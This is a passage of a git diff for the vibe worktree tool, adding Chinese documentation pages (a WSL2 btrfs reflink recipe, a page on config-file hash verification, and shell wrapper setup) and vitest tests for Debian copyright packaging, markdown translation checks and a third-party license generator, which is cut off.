+垂直分割：
+
+```toml
+[hooks]
+post_start = ['[ -n "$TMUX" ] && tmux split-window -v -c "$VIBE_WORKTREE_PATH"']
+```

--- a/packages/docs/src/content/docs/zh/recipes/wsl2-btrfs.mdx
+++ b/packages/docs/src/content/docs/zh/recipes/wsl2-btrfs.mdx
@@ -1,0 +1,65 @@
+---
+title: WSL2 + btrfs
+description: 通过挂载 btrfs 卷在 WSL2 中启用真正的 Copy-on-Write (reflink) 复制
+sidebar:
+  order: 5
+---
+
+在 WSL2 内部，vibe 以 Linux 身份运行，并会自动选择 `clone`（`cp --reflink`）或 `rsync` [复制策略](/zh/configuration/vibe-toml/#复制性能优化)——无需任何配置。但 WSL2 的根文件系统始终是 **ext4**，它并不支持 reflink，因此 `cp --reflink=auto` 会静默地回退为完整复制。
+
+要在 WSL2 中获得真正的 Copy-on-Write，需要单独挂载一个 **btrfs** 卷，并把项目（例如 `node_modules`）放在上面。只要项目位于 btrfs 上，vibe 现有的 `clone` 策略就会自动产生瞬时的 CoW 复制。
+
+## 为什么 WSL 根目录无法实现 CoW
+
+- WSL2 的根目录是 **ext4** 且被硬编码——无法通过 `.wslconfig` 或 `wsl.conf` 配置（参见 [microsoft/WSL#9339](https://github.com/microsoft/WSL/issues/9339)）。
+- 使用「btrfs 发行版」（openSUSE / Fedora）**并不能**解决问题：无论使用哪个发行版，WSL 都会把 rootfs 解包到它自己的 ext4 VHDX 中。
+- 对根目录执行 `btrfs-convert` **并不可行**——转换后的根目录无法在 WSL 中启动。
+- reflink 只能在**同一文件系统内**工作，因此源文件和副本必须都位于 btrfs 卷上。
+
+## 推荐方案 — 挂载一块辅助的 btrfs VHD
+
+:::caution
+`wsl --mount` 需要 Windows 11（或 Store 版本的 WSL）以及**管理员权限**的 PowerShell（以管理员身份运行）。
+:::
+
+在 Windows 一侧，打开管理员权限的 PowerShell，创建 VHD 并将其挂接到 WSL：
+
+```powershell
+New-VHD -Path C:\wsl\dev-btrfs.vhdx -Dynamic -SizeBytes 128GB -BlockSizeBytes 1MB
+wsl --mount --vhd C:\wsl\dev-btrfs.vhdx --bare
+```
+
+然后在 WSL 内部，对该卷执行一次格式化和挂载：
+
+```bash
+lsblk                                  # 找到新设备，例如 /dev/sdd
+sudo mkfs.btrfs /dev/sdd
+sudo mkdir -p /mnt/btrfs
+sudo blkid /dev/sdd                    # 复制 UUID
+echo 'UUID=<uuid> /mnt/btrfs btrfs defaults,nofail 0 0' | sudo tee -a /etc/fstab
+sudo mount -a
+sudo chown $USER:$USER /mnt/btrfs
+
+# 把项目放到 btrfs 卷上；reflink 在其内部可以工作
+mv ~/myproject /mnt/btrfs/myproject
+cd /mnt/btrfs && cp --reflink=always -r myproject myproject-copy
+```
+
+## 重启后重新挂接
+
+`wsl --mount --vhd ... --bare` 是宿主机一侧的操作，在 Windows 重启后必须重新执行（例如设置一个「使用最高权限运行」的登录时任务计划）。磁盘挂接完成后，`/etc/fstab` 会自动挂载它（`automount.mountFsTab` 默认为 `true`）。
+
+## 注意事项
+
+:::caution
+
+- 跨文件系统的 reflink 是不可能的——从 ext4 根目录复制到 btrfs 卷是完整复制。
+- 在同一个 btrfs 上跨挂载点使用 reflink 需要内核 ≥ 5.18；WSL2 的 6.6 内核满足该条件。
+  :::
+
+## 参考资料
+
+- [MS Learn – 在 WSL2 中挂载 Linux 磁盘](https://learn.microsoft.com/zh-cn/windows/wsl/wsl2-mount-disk)
+- [microsoft/WSL#9339 – 非 ext4 根文件系统](https://github.com/microsoft/WSL/issues/9339)
+- [btrfs docs – Reflink](https://btrfs.readthedocs.io/en/latest/Reflink.html)
+- vibe – [复制性能优化](/zh/configuration/vibe-toml/#复制性能优化)

--- a/packages/docs/src/content/docs/zh/security/index.mdx
+++ b/packages/docs/src/content/docs/zh/security/index.mdx
@@ -1,0 +1,131 @@
+---
+title: 安全性
+description: 哈希校验与安全特性
+sidebar:
+  order: 1
+---
+
+vibe 内置了多项安全特性，用于防止配置文件被未经授权地修改。
+
+## 哈希校验
+
+vibe 会使用 SHA-256 哈希自动校验 `.vibe.toml` 和 `.vibe.local.toml` 文件的完整性。
+
+### 工作原理
+
+1. 当你运行 `vibe trust` 时，vibe 会计算并保存 SHA-256 哈希
+2. 当你运行 `vibe start` 时，vibe 会校验文件是否被修改过
+3. 如果哈希不匹配，vibe 会报错并退出
+
+### 信任流程
+
+```
+首次使用：
+  vibe trust → 保存哈希 → 准备就绪
+
+后续使用：
+  vibe start → 校验哈希 → ✓ 匹配 → 运行钩子
+                        → ✗ 不匹配 → 报错（需要重新信任）
+```
+
+## 设置文件
+
+信任信息保存在 `~/.config/vibe/settings.json` 中：
+
+```json
+{
+  "version": 3,
+  "permissions": {
+    "allow": [
+      {
+        "repoId": {
+          "remoteUrl": "github.com/user/repo",
+          "repoRoot": "/path/to/repo"
+        },
+        "relativePath": ".vibe.toml",
+        "hashes": ["abc123..."]
+      }
+    ],
+    "deny": []
+  }
+}
+```
+
+### 基于仓库的信任
+
+版本 3 采用基于仓库的信任标识：
+
+- 信任会在同一仓库的所有 worktree 之间共享
+- 首次加载时，设置会自动从 v2 迁移到 v3
+
+## 跳过哈希检查
+
+:::caution
+只有在你理解相应的安全影响之后，才应该关闭哈希校验。
+:::
+
+### 全局设置
+
+为所有仓库关闭校验：
+
+```json
+{
+  "version": 3,
+  "skipHashCheck": true,
+  "permissions": { "allow": [], "deny": [] }
+}
+```
+
+### 按文件设置
+
+仅为某个特定文件关闭校验：
+
+```json
+{
+  "version": 3,
+  "permissions": {
+    "allow": [
+      {
+        "repoId": {
+          "remoteUrl": "github.com/user/repo",
+          "repoRoot": "/path/to/repo"
+        },
+        "relativePath": ".vibe.toml",
+        "hashes": ["abc123..."],
+        "skipHashCheck": true
+      }
+    ],
+    "deny": []
+  }
+}
+```
+
+## 分支切换
+
+vibe 会为每个文件保存多个哈希（最多 100 个），因此你可以在分支之间切换而无需重新信任：
+
+- 每个已信任版本的哈希都会被保存
+- 切换分支时，vibe 会对照所有已保存的哈希进行检查
+- 只要当前哈希与任意一个已保存的哈希匹配，校验即通过
+
+## 安全注意事项
+
+信任机制只校验配置文件自你信任之后是否被修改过。但请注意以下几点：
+
+- **信任是一种意愿声明**：当你运行 `vibe trust` 时，即表示你已经审阅并批准了这些配置文件，包括其中包含的所有钩子命令。
+- **钩子会执行任意命令**：在 `hooks.pre_start`、`hooks.post_start` 等中定义的命令会在你的 shell 中执行。vibe 不会对这些命令进行沙箱隔离或限制。
+- **信任之前先审阅**：在运行 `vibe trust` 之前，请务必审阅 `.vibe.toml` 和 `.vibe.local.toml` 文件，尤其是在你无法掌控的仓库中。
+- **哈希校验不是恶意软件防护**：哈希检查只能检测出你已信任文件的变更，并不会评估这些命令本身是否安全。
+
+## 最佳实践
+
+1. 在运行 `vibe trust` 之前**务必审阅变更**
+2. 在生产环境中**不要跳过哈希检查**
+3. **将 `.vibe.local.toml` 保留在本地** —— 它已被自动加入 gitignore
+4. 在代码评审时**审阅团队对 `.vibe.toml` 的变更**
+5. **对不受信任的仓库保持警惕** —— 信任之前请先审阅钩子命令
+
+## 相关内容
+
+- [trust](/zh/commands/trust/) - 信任管理命令
+- [配置](/zh/configuration/) - 配置文件格式

--- a/packages/docs/src/content/docs/zh/setup.mdx
+++ b/packages/docs/src/content/docs/zh/setup.mdx
@@ -1,0 +1,137 @@
+---
+title: Shell 设置
+description: 配置你的 shell 以使用 vibe
+---
+
+import { Tabs, TabItem } from "@astrojs/starlight/components";
+
+vibe 需要一个 shell 包装函数，才能在创建或清理 worktree 之后切换目录。请将相应的配置添加到你的 shell 中。
+
+## Shell 配置
+
+<Tabs>
+  <TabItem label="Zsh">
+    请将以下内容中的**其中一项**添加到 `~/.zshrc`。不要同时添加两者 —— 否则包装函数会被定义两次。
+
+    推荐 —— 包装函数 + Tab 补全（子命令、标志，以及 `vibe start` / `vibe jump` 的分支名）：
+
+    ```bash
+    autoload -Uz compinit && compinit
+    eval "$(vibe shell-setup --shell zsh --with-completion)"
+    ```
+
+    这两行会同时定义 `vibe` 包装函数并注册 zsh 补全。`compinit` 那一行是 zsh 补全系统所必需的 —— 如果你已经在 `~/.zshrc` 的其他地方调用了 `compinit`，请把 `eval` 那一行放在该调用*之后*。如果 `compinit` 未被执行，补全注册会被静默跳过，但 `vibe` 包装函数仍会被定义。
+
+    仅包装函数（无 Tab 补全）：
+
+    ```bash
+    vibe() { eval "$(command vibe "$@")" }
+    ```
+
+  </TabItem>
+  <TabItem label="Bash">
+    添加到 `~/.bashrc`：
+
+    ```bash
+    vibe() { eval "$(command vibe "$@")"; }
+    ```
+
+  </TabItem>
+  <TabItem label="Fish">
+    请将以下内容中的**其中一项**添加到 `~/.config/fish/config.fish`。不要同时添加两者 —— 否则包装函数会被定义两次。
+
+    推荐 —— 包装函数 + Tab 补全（子命令、标志，以及 `vibe start` / `vibe jump` 的分支名）：
+
+    ```fish
+    vibe shell-setup --shell fish --with-completion | source
+    ```
+
+    仅这一行就能同时定义 `vibe` 包装函数并注册 fish 补全。
+
+    仅包装函数（无 Tab 补全）：
+
+    ```fish
+    function vibe
+        eval (command vibe $argv)
+    end
+    ```
+
+  </TabItem>
+  <TabItem label="Nushell">
+    添加到 `~/.config/nushell/config.nu`：
+
+    ```nu
+    def --env --wrapped vibe [...args] {
+        let out = (^vibe --eval-dialect nu ...$args)
+        for line in ($out | lines) {
+            if ($line | str starts-with "__VIBE_CD__") {
+                cd ($line | str replace "__VIBE_CD__" "")
+            } else {
+                print $line
+            }
+        }
+    }
+    ```
+
+    :::note
+    需要 vibe 2.2.0 或更高版本，以及 nushell 0.83 或更高版本。如果你之前粘贴过旧的 `nu -c`
+    代码片段，请将其替换 —— 那个版本实际上从未改变过你的目录，因为 `nu -c` 是在子进程中执行
+    `cd` 的，而且它会拒绝任何带标志的命令。`--wrapped` 和 `for` 两者都是必需的：`--wrapped`
+    让标志能传递到 `...args`，而 nushell 会丢弃在 `each` 闭包内所做的环境变更。
+    :::
+
+  </TabItem>
+  <TabItem label="PowerShell">
+    添加到你的 `$PROFILE`：
+
+    ```powershell
+    function vibe { $out = & vibe.exe --eval-dialect powershell @args; if ($out) { Invoke-Expression ($out -join "`n") } }
+    ```
+
+    :::note
+    需要 vibe 2.2.0 或更高版本。如果你之前粘贴过旧的
+    `Invoke-Expression (& vibe.exe $args)` 代码片段，请将其替换 —— 那个版本无法正确处理
+    包含单引号的路径，并且在 vibe 没有产生任何输出时会抛出错误。
+    :::
+
+  </TabItem>
+</Tabs>
+
+## 使用 mise（自动配置）
+
+如果你是通过 [mise](/zh/installation/) 安装 vibe 的，可以利用 mise 的 [hooks](https://mise.jdx.dev/hooks.html) 功能来自动完成 shell 设置。
+
+将以下内容添加到项目的 `.mise.toml`：
+
+```toml
+[hooks]
+enter = 'eval "$(vibe shell-setup)"'
+```
+
+:::note
+这需要在你的 shell 中启用 [`mise activate`](https://mise.jdx.dev/getting-started.html#activate-mise)。
+`enter` 钩子会在你进入项目目录时自动运行，检测你所使用的 shell 并定义相应的包装函数。
+:::
+
+## 为什么需要这样做？
+
+当 vibe 创建 worktree 时，它需要把你当前的工作目录切换到新的 worktree。然而，子进程无法直接改变父进程的目录。
+
+shell 包装函数会捕获 vibe 的输出（其中包含类似 `cd /path/to/worktree` 的 shell 命令），并在当前 shell 上下文中执行它。
+
+## 验证安装
+
+添加 shell 配置之后，重新加载你的 shell 并进行验证：
+
+```bash
+# 重新加载 shell 或打开一个新终端
+source ~/.zshrc  # 或 ~/.bashrc 等
+
+# 确认 vibe 可以正常工作
+vibe --help
+```
+
+## 下一步
+
+- [配置](/zh/configuration/) - 设置 `.vibe.toml` 以实现自动化工作流
+- [命令](/zh/commands/) - 了解可用的命令

--- a/packages/npm/test/build-deb.test.ts
+++ b/packages/npm/test/build-deb.test.ts
@@ -1,0 +1,182 @@
+/**
+ * Tests for scripts/build-deb.ts — the .deb packaging step, specifically the
+ * documentation it installs under /usr/share/doc/vibe.
+ *
+ * A Debian binary package has no License: control field, so the machine-readable
+ * DEP-5 copyright file is the package's only statement of terms, and
+ * THIRD-PARTY-LICENSES.md is the only place the statically-linked Rust crates'
+ * notices appear. What these guarantee:
+ *   - the copyright file is valid DEP-5 1.0: the Format URI, a Files/License
+ *     stanza, and a license body reformatted with ` .` for blank lines;
+ *   - the MIT body and the copyright holder are DERIVED from the repo LICENSE,
+ *     never hardcoded, so the .deb cannot state terms the project does not ship;
+ *   - a license text DEP-5 cannot represent (a line starting with `.`) or one
+ *     with no recognizable copyright line is a hard failure, not a silently
+ *     mangled legal document;
+ *   - staging installs both documents with explicit, umask-independent modes
+ *     (0755 dir / 0644 files) and treats either source's absence as fatal —
+ *     both are committed files, so missing means a broken checkout.
+ *
+ * Runs against a temp root (the `root` option) so the real repo is never written to.
+ */
+
+import { describe, it, expect, beforeEach, afterEach } from "vitest";
+import { mkdtempSync, rmSync, writeFileSync, readFileSync, statSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import {
+  renderDebianCopyright,
+  formatDep5Text,
+  extractCopyrightLine,
+  stageDocFiles,
+} from "../../../scripts/build-deb";
+
+const MIT_LICENSE = `MIT License
+
+Copyright (c) 2025 Kei Nakayama (kexi) and the vibe contributors
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction.
+`;
+
+describe("extractCopyrightLine", () => {
+  it("pulls the Copyright (c) line out of the license text", () => {
+    expect(extractCopyrightLine(MIT_LICENSE)).toBe(
+      "Copyright (c) 2025 Kei Nakayama (kexi) and the vibe contributors",
+    );
+  });
+
+  it("throws when no copyright line can be found (never invents a holder)", () => {
+    expect(() => extractCopyrightLine("Some terms with no holder\n")).toThrowError(/Copyright/);
+  });
+});
+
+describe("formatDep5Text", () => {
+  it("indents non-blank lines by one space", () => {
+    expect(formatDep5Text("alpha\nbeta\n")).toBe(" alpha\n beta");
+  });
+
+  it("represents blank lines as ' .'", () => {
+    expect(formatDep5Text("alpha\n\nbeta\n")).toBe(" alpha\n .\n beta");
+  });
+
+  it("treats a whitespace-only line as blank", () => {
+    expect(formatDep5Text("alpha\n   \nbeta\n")).toBe(" alpha\n .\n beta");
+  });
+
+  it("normalizes CRLF input", () => {
+    expect(formatDep5Text("alpha\r\n\r\nbeta\r\n")).toBe(" alpha\n .\n beta");
+  });
+
+  it("throws on a line starting with '.' (DEP-5 would read it back as blank)", () => {
+    expect(() => formatDep5Text("alpha\n.hidden\n")).toThrowError(/DEP-5/);
+  });
+});
+
+describe("renderDebianCopyright", () => {
+  const out = renderDebianCopyright({ licenseText: MIT_LICENSE });
+
+  it("declares the machine-readable DEP-5 1.0 format on the first line", () => {
+    expect(out.startsWith("Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/\n")).toBe(
+      true,
+    );
+  });
+
+  it("identifies the upstream project and source", () => {
+    expect(out).toContain("Upstream-Name: vibe");
+    expect(out).toContain("Source: https://github.com/kexi/vibe");
+  });
+
+  it("declares Files: * under the MIT license", () => {
+    expect(out).toContain("Files: *");
+    expect(out).toMatch(/^License: MIT$/m);
+  });
+
+  it("carries the copyright holder derived from the license text", () => {
+    expect(out).toContain(
+      "Copyright: Copyright (c) 2025 Kei Nakayama (kexi) and the vibe contributors",
+    );
+  });
+
+  it("points at the third-party notices installed beside it", () => {
+    expect(out).toContain("/usr/share/doc/vibe/THIRD-PARTY-LICENSES.md");
+  });
+
+  it("reproduces the MIT body as an indented DEP-5 block", () => {
+    expect(out).toContain(" Permission is hereby granted, free of charge, to any person obtaining a copy");
+    expect(out).toContain("\n .\n");
+  });
+
+  it("propagates a license text DEP-5 cannot represent", () => {
+    expect(() => renderDebianCopyright({ licenseText: "Copyright (c) 2025 x\n.oops\n" })).toThrowError(
+      /DEP-5/,
+    );
+  });
+});
+
+describe("stageDocFiles", () => {
+  let root: string;
+  let packageDir: string;
+
+  beforeEach(() => {
+    root = mkdtempSync(join(tmpdir(), "vibe-deb-root-"));
+    packageDir = mkdtempSync(join(tmpdir(), "vibe-deb-pkg-"));
+  });
+
+  afterEach(() => {
+    rmSync(root, { recursive: true, force: true });
+    rmSync(packageDir, { recursive: true, force: true });
+  });
+
+  function seedRoot(): void {
+    writeFileSync(join(root, "LICENSE"), MIT_LICENSE);
+    writeFileSync(join(root, "THIRD-PARTY-LICENSES.md"), "# Third-Party Licenses\n");
+  }
+
+  it("installs copyright and THIRD-PARTY-LICENSES.md under usr/share/doc/vibe", async () => {
+    seedRoot();
+    await stageDocFiles(packageDir, { root });
+
+    const docDir = join(packageDir, "usr", "share", "doc", "vibe");
+    expect(readFileSync(join(docDir, "copyright"), "utf-8")).toContain("Format: https://");
+    expect(readFileSync(join(docDir, "THIRD-PARTY-LICENSES.md"), "utf-8")).toBe(
+      "# Third-Party Licenses\n",
+    );
+  });
+
+  it("copies the notices verbatim (uncompressed, byte-for-byte)", async () => {
+    writeFileSync(join(root, "LICENSE"), MIT_LICENSE);
+    const notices = "# Third-Party Licenses\n\n| Crate | Version |\n| a | 1.0 |\n";
+    writeFileSync(join(root, "THIRD-PARTY-LICENSES.md"), notices);
+
+    await stageDocFiles(packageDir, { root });
+
+    const staged = join(packageDir, "usr", "share", "doc", "vibe", "THIRD-PARTY-LICENSES.md");
+    expect(readFileSync(staged, "utf-8")).toBe(notices);
+  });
+
+  it("sets explicit 0755/0644 modes so the caller's umask cannot hide the docs", async () => {
+    seedRoot();
+    await stageDocFiles(packageDir, { root });
+
+    const docDir = join(packageDir, "usr", "share", "doc", "vibe");
+    expect(statSync(docDir).mode & 0o777).toBe(0o755);
+    expect(statSync(join(docDir, "copyright")).mode & 0o777).toBe(0o644);
+    expect(statSync(join(docDir, "THIRD-PARTY-LICENSES.md")).mode & 0o777).toBe(0o644);
+  });
+
+  it("throws when the root LICENSE is missing (a committed file: a broken checkout)", async () => {
+    writeFileSync(join(root, "THIRD-PARTY-LICENSES.md"), "# notices\n");
+    await expect(stageDocFiles(packageDir, { root })).rejects.toThrowError(/LICENSE not found/);
+  });
+
+  it("throws when THIRD-PARTY-LICENSES.md is missing (a .deb must not drop crate notices)", async () => {
+    // Unlike the npm staging step, which only warns, there is no later release
+    // gate for the .deb and the file is committed rather than a build product.
+    writeFileSync(join(root, "LICENSE"), MIT_LICENSE);
+    await expect(stageDocFiles(packageDir, { root })).rejects.toThrowError(
+      /THIRD-PARTY-LICENSES\.md not found/,
+    );
+  });
+});

--- a/packages/npm/test/check-markdown-i18n.test.ts
+++ b/packages/npm/test/check-markdown-i18n.test.ts
@@ -1,0 +1,278 @@
+/**
+ * What these guarantee for `scripts/check-markdown-i18n.ts`:
+ *
+ *   - a document with NO translation sibling (CONTRIBUTING.md, AGENTS.md,
+ *     packages/npm/README.md …) is out of scope by derivation, so the check
+ *     never needs an exclusion list to maintain;
+ *   - once any translation exists, a missing en/ja/zh member is reported, in
+ *     both directions (a lone `.zh.md` demands `.md` and `.ja.md` too);
+ *   - the docs-site locale directories must hold exactly the English page set —
+ *     an unmirrored page AND an orphan translation both fail;
+ *   - the cross-language header check accepts every header styling the repo
+ *     actually uses (bare link, 🇯🇵 blockquote, `> [!NOTE]` + `:jp:` shortcode)
+ *     while still failing when a language is absent from it;
+ *   - directory walking skips node_modules and other build output.
+ *
+ * The filesystem-touching cases build a throwaway fixture tree under the OS temp
+ * dir; the pure set/link functions are driven directly with literals.
+ */
+
+import { describe, it, expect, beforeEach, afterEach } from "vitest";
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join, dirname } from "node:path";
+
+import {
+  collectMarkdownFiles,
+  collectMdxFiles,
+  markdownBase,
+  markdownLocale,
+  findIncompleteTriplets,
+  diffDocsLocaleSets,
+  expectedSiblingLinks,
+  headerLinksTo,
+  checkCrossLinks,
+  collectFailures,
+} from "../../../scripts/check-markdown-i18n.ts";
+
+let root: string;
+
+function write(relPath: string, content = "# placeholder\n"): void {
+  const full = join(root, relPath);
+  mkdirSync(dirname(full), { recursive: true });
+  writeFileSync(full, content, "utf-8");
+}
+
+beforeEach(() => {
+  root = mkdtempSync(join(tmpdir(), "vibe-i18n-"));
+});
+
+afterEach(() => {
+  rmSync(root, { recursive: true, force: true });
+});
+
+describe("markdownBase / markdownLocale", () => {
+  it("groups the three locales of a document under one base", () => {
+    expect(markdownBase("docs/architecture.md")).toBe("docs/architecture");
+    expect(markdownBase("docs/architecture.ja.md")).toBe("docs/architecture");
+    expect(markdownBase("docs/architecture.zh.md")).toBe("docs/architecture");
+  });
+
+  it("reports the locale of each member", () => {
+    expect(markdownLocale("README.md")).toBe("en");
+    expect(markdownLocale("README.ja.md")).toBe("ja");
+    expect(markdownLocale("README.zh.md")).toBe("zh");
+  });
+
+  it("ignores non-markdown paths", () => {
+    expect(markdownBase("package.json")).toBeNull();
+  });
+});
+
+describe("findIncompleteTriplets", () => {
+  it("accepts a complete en/ja/zh triplet", () => {
+    const files = ["README.md", "README.ja.md", "README.zh.md"];
+    expect(findIncompleteTriplets(files)).toEqual([]);
+  });
+
+  it("ignores an untranslated document instead of demanding translations", () => {
+    const files = ["CONTRIBUTING.md", "AGENTS.md", "packages/npm/README.md"];
+    expect(findIncompleteTriplets(files)).toEqual([]);
+  });
+
+  it("reports the missing Chinese member of a translated document", () => {
+    const files = ["docs/architecture.md", "docs/architecture.ja.md"];
+    expect(findIncompleteTriplets(files)).toEqual([
+      { base: "docs/architecture", missing: ["docs/architecture.zh.md"] },
+    ]);
+  });
+
+  it("demands the English original and the Japanese sibling of a lone Chinese file", () => {
+    expect(findIncompleteTriplets(["guide.zh.md"])).toEqual([
+      { base: "guide", missing: ["guide.md", "guide.ja.md"] },
+    ]);
+  });
+});
+
+describe("diffDocsLocaleSets", () => {
+  it("passes when every locale mirrors the English page set", () => {
+    const english = ["index.mdx", "commands/start.mdx"];
+    const problems = diffDocsLocaleSets(english, {
+      ja: ["index.mdx", "commands/start.mdx"],
+      zh: ["commands/start.mdx", "index.mdx"],
+    });
+    expect(problems).toEqual([]);
+  });
+
+  it("reports a page missing from one locale", () => {
+    const problems = diffDocsLocaleSets(["index.mdx", "setup.mdx"], {
+      ja: ["index.mdx", "setup.mdx"],
+      zh: ["index.mdx"],
+    });
+    expect(problems).toEqual([{ locale: "zh", missing: ["setup.mdx"], extra: [] }]);
+  });
+
+  it("reports an orphan translation with no English original", () => {
+    const problems = diffDocsLocaleSets(["index.mdx"], {
+      ja: ["index.mdx"],
+      zh: ["index.mdx", "legacy.mdx"],
+    });
+    expect(problems).toEqual([{ locale: "zh", missing: [], extra: ["legacy.mdx"] }]);
+  });
+});
+
+describe("expectedSiblingLinks / headerLinksTo", () => {
+  it("expects each file to link to the other two languages by file name", () => {
+    expect(expectedSiblingLinks("docs/architecture", "en")).toEqual([
+      "architecture.ja.md",
+      "architecture.zh.md",
+    ]);
+    expect(expectedSiblingLinks("docs/architecture", "ja")).toEqual([
+      "architecture.md",
+      "architecture.zh.md",
+    ]);
+    expect(expectedSiblingLinks("docs/architecture", "zh")).toEqual([
+      "architecture.md",
+      "architecture.ja.md",
+    ]);
+  });
+
+  it("accepts both the ./-prefixed and bare link targets", () => {
+    expect(headerLinksTo("> 🇯🇵 [日本語版](./x.ja.md)", "x.ja.md")).toBe(true);
+    expect(headerLinksTo("[日本語](x.ja.md)", "x.ja.md")).toBe(true);
+    expect(headerLinksTo("no links here", "x.ja.md")).toBe(false);
+  });
+});
+
+describe("checkCrossLinks", () => {
+  const files = ["doc.md", "doc.ja.md", "doc.zh.md"];
+
+  it("accepts the 🇯🇵 blockquote styling", () => {
+    const contents: Record<string, string> = {
+      "doc.md": "> 🇯🇵 [日本語版](./doc.ja.md) | 🇨🇳 [简体中文](./doc.zh.md)\n\n# Doc\n",
+      "doc.ja.md": "> 🇺🇸 [English](./doc.md) | 🇨🇳 [简体中文](./doc.zh.md)\n\n# Doc\n",
+      "doc.zh.md": "> 🇺🇸 [English](./doc.md) | 🇯🇵 [日本語版](./doc.ja.md)\n\n# Doc\n",
+    };
+    expect(checkCrossLinks(files, (p) => contents[p] ?? "")).toEqual([]);
+  });
+
+  it("accepts the > [!NOTE] callout with GitHub emoji shortcodes", () => {
+    const contents: Record<string, string> = {
+      "doc.md": "> [!NOTE]\n> :jp: [日本語版](./doc.ja.md) | :cn: [简体中文](./doc.zh.md)\n\n# Doc\n",
+      "doc.ja.md": "> [!NOTE]\n> :us: [English](./doc.md) | :cn: [简体中文](./doc.zh.md)\n\n# Doc\n",
+      "doc.zh.md": "> [!NOTE]\n> :us: [English](./doc.md) | :jp: [日本語版](./doc.ja.md)\n\n# Doc\n",
+    };
+    expect(checkCrossLinks(files, (p) => contents[p] ?? "")).toEqual([]);
+  });
+
+  it("accepts a bare link line placed a few lines into the file", () => {
+    const contents: Record<string, string> = {
+      "doc.md": "# vibe\n\nTagline.\n\n[日本語](doc.ja.md) | [简体中文](doc.zh.md)\n",
+      "doc.ja.md": "# vibe\n\n説明。\n\n[English](doc.md) | [简体中文](doc.zh.md)\n",
+      "doc.zh.md": "# vibe\n\n说明。\n\n[English](doc.md) | [日本語版](doc.ja.md)\n",
+    };
+    expect(checkCrossLinks(files, (p) => contents[p] ?? "")).toEqual([]);
+  });
+
+  it("reports a header that omits the Chinese link", () => {
+    const contents: Record<string, string> = {
+      "doc.md": "> 🇯🇵 [日本語版](./doc.ja.md)\n\n# Doc\n",
+      "doc.ja.md": "> 🇺🇸 [English](./doc.md) | 🇨🇳 [简体中文](./doc.zh.md)\n",
+      "doc.zh.md": "> 🇺🇸 [English](./doc.md) | 🇯🇵 [日本語版](./doc.ja.md)\n",
+    };
+    expect(checkCrossLinks(files, (p) => contents[p] ?? "")).toEqual([
+      { file: "doc.md", missingLinks: ["doc.zh.md"] },
+    ]);
+  });
+
+  it("ignores a link that appears below the header window", () => {
+    const contents: Record<string, string> = {
+      "doc.md": "\n\n\n\n\n\n[日本語](doc.ja.md) | [简体中文](doc.zh.md)\n",
+      "doc.ja.md": "[English](doc.md) | [简体中文](doc.zh.md)\n",
+      "doc.zh.md": "[English](doc.md) | [日本語版](doc.ja.md)\n",
+    };
+    expect(checkCrossLinks(files, (p) => contents[p] ?? "")).toEqual([
+      { file: "doc.md", missingLinks: ["doc.ja.md", "doc.zh.md"] },
+    ]);
+  });
+
+  it("does not demand links from an untranslated document", () => {
+    expect(checkCrossLinks(["CONTRIBUTING.md"], () => "# Contributing\n")).toEqual([]);
+  });
+});
+
+describe("collectMarkdownFiles / collectMdxFiles", () => {
+  it("walks nested directories and skips build output", () => {
+    write("README.md");
+    write("docs/architecture.md");
+    write("node_modules/pkg/README.md");
+    write("packages/docs/dist/index.md");
+
+    expect(collectMarkdownFiles(root)).toEqual(["README.md", "docs/architecture.md"]);
+  });
+
+  it("returns mdx paths relative to the given directory", () => {
+    write("content/index.mdx");
+    write("content/commands/start.mdx");
+    write("content/notes.txt");
+
+    expect(collectMdxFiles(join(root, "content"))).toEqual([
+      "commands/start.mdx",
+      "index.mdx",
+    ]);
+  });
+});
+
+describe("collectFailures (end to end over a fixture tree)", () => {
+  const DOCS = "packages/docs/src/content/docs";
+
+  function writeCompleteFixture(): void {
+    write("README.md", "[日本語](README.ja.md) | [简体中文](README.zh.md)\n");
+    write("README.ja.md", "[English](README.md) | [简体中文](README.zh.md)\n");
+    write("README.zh.md", "[English](README.md) | [日本語版](README.ja.md)\n");
+    write("CONTRIBUTING.md", "# Contributing\n");
+    for (const prefix of ["", "ja/", "zh/"]) {
+      write(`${DOCS}/${prefix}index.mdx`);
+      write(`${DOCS}/${prefix}commands/start.mdx`);
+    }
+  }
+
+  it("passes on a fully synchronized tree", () => {
+    writeCompleteFixture();
+    expect(collectFailures(root)).toEqual([]);
+  });
+
+  it("fails with the missing markdown translation named", () => {
+    writeCompleteFixture();
+    rmSync(join(root, "README.zh.md"));
+
+    const failures = collectFailures(root);
+    expect(failures).toContain("README: missing README.zh.md");
+  });
+
+  it("fails with the missing docs page named", () => {
+    writeCompleteFixture();
+    rmSync(join(root, DOCS, "zh", "commands", "start.mdx"));
+
+    const failures = collectFailures(root);
+    expect(failures).toContain(`${DOCS}/zh/commands/start.mdx: missing translation`);
+  });
+
+  it("fails when a locale directory is absent entirely", () => {
+    writeCompleteFixture();
+    rmSync(join(root, DOCS, "zh"), { recursive: true });
+
+    const failures = collectFailures(root);
+    expect(failures).toContain(`${DOCS}/zh: locale directory does not exist`);
+  });
+
+  it("fails when a header lost a language link", () => {
+    writeCompleteFixture();
+    write("README.md", "[日本語](README.ja.md)\n");
+
+    const failures = collectFailures(root);
+    expect(failures).toContain(
+      "README.md: header (first 5 lines) does not link to README.zh.md",
+    );
+  });
+});

--- a/packages/npm/test/third-party-licenses.test.ts
+++ b/packages/npm/test/third-party-licenses.test.ts
@@ -1,0 +1,352 @@
+/**
+ * Tests for scripts/generate-third-party-licenses.ts — the generator behind the
+ * committed THIRD-PARTY-LICENSES.md, and the guards on the committed artifact.
+ *
+ * The shipped binary statically links its Rust dependencies. Where a crate's
+ * SPDX expression is a top-level `AND`, no `OR` election can shed the
+ * obligation, so the crate's own license/notice files must be reproduced in
+ * full. What these guarantee:
+ *   - the SPDX analysis distinguishes an electable `OR` from a binding `AND`,
+ *     including the legacy `/` shorthand, parenthesized subexpressions and
+ *     `WITH` exceptions — a misparse would silently drop a required notice;
+ *   - notice discovery lists a crate's root license files deterministically and
+ *     refuses symlinks, so a crafted crate cannot inline a file from elsewhere
+ *     on the machine into a published document;
+ *   - notice text is normalized (BOM, CRLF, trailing newline) and REJECTED
+ *     rather than repaired when oversized, non-UTF-8 or control-carrying —
